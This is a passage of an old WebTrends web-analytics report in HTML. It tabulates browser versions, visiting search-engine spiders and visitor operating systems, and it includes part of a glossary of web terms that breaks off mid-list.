<TD><IMG SRC="index22.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=5 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>5, .3, 2.7, 1
, 1
, 1
</WT_TABLE_STATS -->
<CENTER><B>Microsoft Explorer Browsers</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Microsoft Explorer Browsers</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Browser</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Explorer 5.x</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">34633</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">74.52%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5305</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Explorer 6.x</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9935</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">21.37%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1044</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Explorer 4.x</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1822</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.92%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">255</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Explorer 3.x</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">84</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.18%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">18</TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total For Browsers Above</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>46474</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>100%</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>6622</B></TD>
</TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopSpiders"><!--Browsers & Platforms::Visiting Spiders--></A>
<!-- WT_H1>Visiting Spiders</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Visiting Spiders</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies all robots, spiders, crawlers and search services (i.e. Alta Vista, Lycos, and Excite) visiting the site.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index23.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=5 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>5, .3, 2.7, 1
, 1
, 1
</WT_TABLE_STATS -->
<CENTER><B>Visiting Spiders</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Visiting Spiders</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Spider</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>FAST-WebCrawler</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">744</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">36.88%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">103</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Scooter-W3.1.2</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">293</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14.52%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">212</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>ArchitextSpider</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">225</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11.15%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">220</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Mozilla/5.0 (Slurp/cat; slurp@inktomi.com; http://www.inktomi.com/slurp.html)</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">187</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9.27%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">169</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Gulliver</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">97</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.8%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">35</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Mozilla/3.0 (Slurp/si; slurp@inktomi.com; http://www.inktomi.com/slurp.html)</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">64</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.17%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">34</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Scooter-W3-1.0</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">64</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.17%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">12</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>tivraSpider</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">55</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.72%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Mozilla/3.0 (Slurp/cat; slurp@inktomi.com; http://www.inktomi.com/slurp.html)</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">54</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.67%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">48</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Openfind data gatherer, Openbot</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">46</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.28%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total For Spiders Above</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>1829</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>90.67%</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>847</B></TD>
</TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopPlatforms"><!--Browsers & Platforms::Most Used Platforms--></A>
<!-- WT_H1>Most Used Platforms</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Most Used Platforms</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the operating systems most used by the visitors to the site.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index24.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=5 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>5, .3, 2.7, 1
, 1
, 1
</WT_TABLE_STATS -->
<CENTER><B>Most Used Platforms</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Most Used Platforms</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Platform</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Others</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">40899</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">64.89%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8873</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Windows NT</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">12108</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">19.21%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1337</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Windows Win32s</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4860</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7.71%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">35</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Windows 95</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3760</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.96%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">558</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Macintosh</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1183</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.87%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">71</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Linux</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">191</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.3%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">21</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>SunOS</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">25</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.03%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total For Platforms Above</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>63026</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>100%</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>10898</B></TD>
</TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<!-- ----------------- ------------- -->
<!-- ----------------- ------------- -->
<a name="Glossary"><!--Glossary::Glossary--></A>
<!-- WT_H1>Glossary</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Glossary</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000">
<!-- WT_DESCRIPTION -->Following are definitions for terms used in this report and throughout the World-Wide Web in general. These terms are also common to the WebTrends analysis tool.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P>
<FONT SIZE=3 FACE="Arial" COLOR="#000000">
<!-- GLOSSARY_START -->
<CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=2 ROWSPAN=1><FONT SIZE=+1 COLOR="#000000" FACE="Arial">
<!-- WT_TABLE_STATS>2,1.5,4.5</WT_TABLE_STATS -->
<!-- WT_NO_COLUMN_TITLES -->
<!-- WT_GLOSSARY -->
<CENTER><B>Glossary</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Glossary</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Ad</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">A graphic or a banner on a web page that when clicked on, takes the visitor to another site.</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Ad Clicks</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">A click on an advertisement on a web site which takes a user to another site, it is referred to as an ad click.</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Ad Views</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">A web page that presents an ad. Once the visitor has viewed an ad, he/she can click on it (see Ad Click). There may be more than one ad on an ad view.</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Authentication</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Technique by which access to Internet or Intranet resources requires the user to identify himself or herself by entering a username and password.</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Bandwidth</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Measure (in kilobytes of data transferred) of the traffic on the site.</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Browser</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">A program used to locate and view HTML documents (Netscape, Mosaic, Microsoft Explorer, for example.)</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Click through rate</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Percentage of users who click on a viewed advertisement. This is a good indication of the effectiveness of this ad.</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Client</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">The browser (see above) used by a visitor to a Web site.</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Client Errors</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">An error occurring due to an invalid request by the visitor's browser. Client errors are in the 400-range. See "Return Code" definition.</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Company Database</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">The database installed and used by WebTrends to look up the company name, city, state and country corresponding to a specific domain name.</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Cookies</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Persistent Client-State HTTP Cookies are files containing information about visitors to a web site (e.g., user name and preferences). This information is provided by the user during the first visit to a Web server. The server records this information in a text file and stores this file on the visitor's hard drive. When the visitor accesses the same web site again, the server looks for the cookie and configures itself based on the information provided.</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Domain Name</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">The text name corresponding to the numeric IP address of a computer on the Internet (i.e., www.webtrends.com).</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Domain Name Lookup</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">The process of converting a numeric IP address into a text name (for example, 204.245.240.194 is converted to www.webtrends.com).</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Filters</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">A means of narrowing the scope of a report or view by specifying ranges or types of data to include in or exclude.</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Forms</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">An HTML page which passes variables back to the server. These pages are used to gather information from users. Also referred to as scripts.</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>FTP</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">File Transfer Protocol is a standard method of sending files between computers over the Internet.</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>GIF</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Graphics Interchange Format is an image file format commonly used in HTML documents.</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Hit</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">An action on the Web site, such as when a user views a page or downloads a file.</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Home Page</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">The main page of a Web site. The home page provides visitors with an overview and links to the rest of the site. It often contains or links to a Table of contents for the site.</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Home Page URL</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">The local path or Internet URL to the default page of the Web site for which WebTrends reports will be generated.</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>HTML</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Hyper Text Markup Language is used to write documents for the World Wide Web to specify hypertext links between related objects and documents.</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>HTTP</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Hyper Text Transfer Protocol is a standard method of transferring data between a Web <B>server</B> and a Web <B>browser</B>.</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>IP Address</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Internet Protocol address identifying a computer connected to the Internet.</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Log File</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">A file created by a web or proxy server which contains all of the access information regarding the activity on that server.</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Page Views</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Also called Page Impressions. Hit to HTML pages only (access to non-HTML documents are not counted).</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Platform</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">The operating system (i.e. Windows 95, Windows NT, etc.) used by a visitor to the site.</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Protocol</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">An established method of exchanging data over the Internet.</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Referrer</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">URL of an HTML page that refers to the site.</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Return Code</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">The return status of the request which specifies whether the transfer was successful and why.
<DL><DT><B>Possible "Success" codes are:</B>
<DD><B>200 = Success</B>: OK
<DD><B>201 = Success</B>: Created
<DD><B>202 = Success</B>: Accepted
<DD><B>203 = Success</B>: Partial Information
<DD><B>204 = Success</B>: No Response
<DD><B>300 = Success</B>: Redirected
<DD><B>301 = Success</B>: Moved
<DD><B>302 = Success</B>: Found
<DD><B>303 = Success</B>: New Method
<DD><B>304 = Success</B>: Not Modified
<DT><B>Possible "Failed" codes are</B>:
<DD><B>400 = Failed</B>: Bad Request
<DD><B>401 = Failed</B>: Unauthorized
<DD><B>402 = Failed</B>: Payment Required
<DD><B>403 = Failed</B>: Forbidden
<DD><B>404 = Failed</B>: Not Found
<DD><B>500 = Failed</B>: Internal Error
<DD><B>501 = Failed</B>: Not Implemented
<DD><B>502 = Failed</B>: Overloaded Temporarily
<DD><B>503 = Failed</B>: Gateway Timeout</DL></TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Server</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">A computer that hosts information available to anyone accessing the Internet.</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Server Error</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">An error occurring at the server. Web server errors have codes in the 500 range.</TD></TR>
<TR BGCOLOR="#FFFFFF">
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Spiders</B></TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">An automated program which searches the internet.</TD></TR>
<TR BGCOLOR="#F0F0F0">
